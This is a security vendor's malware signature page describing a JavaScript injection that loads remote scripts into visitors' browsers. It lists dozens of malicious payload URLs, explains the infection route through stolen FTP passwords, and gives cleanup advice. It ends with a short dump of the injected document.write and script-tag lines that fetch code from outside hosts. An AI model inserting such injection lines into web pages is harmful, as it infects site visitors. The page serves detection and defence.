SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs151

malware-entry-mwjs151

Description:
Javascript malware used to load virus to visitors of an infected web site.
The javascript is not encoded and uses different domain names/files (generally at the port 8080):

http://adoffy.alltuckedinathome.com:8080/JavaScript.js 
http://adoffy.alltuckedinathome.com:8080/LED.js 
http://adoffy.alltuckedinathome.com:8080/Upload.js 
http://aospfpgy.dogplaystation.com:8080/Page_View.js 
http://asoosp.acilalisveris.com:8080/Excel.js 
http://assolkh.blackhulu.com:8080/Refresh.js 
http://assolkh.blackhulu.com:8080/Yahoo.js 
http://assol.metro-trading.net:8080/Link.js 
http://blog.aspdesign.net:8080/Bandwidth.js 
http://blog.aspdesign.net:8080/Default.js 
http://blog.locatejobs.org:8080/Joystick.js 
http://bmh-services.co.uk/flash/contact.php 
http://cache.goodnews.fm:8080/LinkedIn.j 
http://cache.xn--mgbay6fcq.com:8080/Optical_Drive.js 
http://diamondbar.la/forums/index8aug.php 
http://dodo.busop.info:8080/Bcc.js 
http://dodo.busop.info:8080/Unfriend.js 
http://dodo.busop.info:8080/Website.js 
http://dolfy.sedonahyperbarics.com:8080/Bcc.js 
http://dolfy.sedonahyperbarics.com:8080/Gnutella.js 
http://dolfy.sedonahyperbarics.com:8080/GUI.js 
http://dolgo.lulucabana.com:8080/Link.js 
http://dolgo.lulucabana.com:8080/Macintosh.js 
http://e-maks.pl/_tmp/product.php 
http://foxy.divarug.com:8080/Mac_OS.js 
http://governance4it.de/tmp/CHANGELOG.php 
http://hoploiyt.hyipface.com:8080/Defragment.js 
http://inc.lamcfoundation.com:8080/Access_Point.js 
http://inc.lamcfoundation.com:8080/Kibibyte.js 
http://kollinsoy.skyefenton.com:8080/AGP.js 
http://kollinsoy.skyefenton.com:8080/Telnet.js 
http://kollinsoy.skyefenton.com:8080/Web_Page.js 
http://lurralde.com/ficheros/pedidos-lurralde.php 
http://luxuryretreatsatcapcana.com/userfiles/email.php 
http://mayaheritage.com/asset/500.php 
http://mking-designs.com/administrator/error_log.php 
http://oployau.fancountblogger.com:8080/Backup.js 
http://printinstant.com/xmlrpc/decoder.php 
http://ruesri.com/plugins/gem.php 
http://sfofotky.iexam.info:8080/Mebibyte.js 
http://sokyoss.drelshazly.com:8080/E-commerce.js 
http://sokyoss.drelshazly.com:8080/Emoticon.js 
http://solk.seamscreative.info:8080/JPEG.js 
http://ssrksodra.com/gammalt/inca_200.php 
http://soaoo.blog-salopes.com:8080/Unmount.js 
http://eurppa.buildadamshomes.com:8080/Paste.js 
http://questtore.hermosayasociados.com:8080/Password.js 
http://kolpo.gunterschaub.com:8080/Keywords.js 
http://temp.aspdesign.net:8080/RADCAB.js 
http://temp.hbsouthmomsclub.com:8080/Name_Server.js 
http://assol.wedonate.info:8080/Laptop.js 
http://soaoo.blog-salopes.com:8080/Unmount.js 

Affecting:
The malware infects the web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the sites.
Note that every PHP, HTML and JS file gets compromised by this malware.

Clean up:
The desktop must be cleanup first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.You can also sign up with usand let our team remove the malware for you.

Malware dump:

document . write('< ' + ' cript src="http://oployau.fancountblogger.com:8080/Backup.js
< script src=" http://hoploiyt.hyipface.com:8080/Zip.js">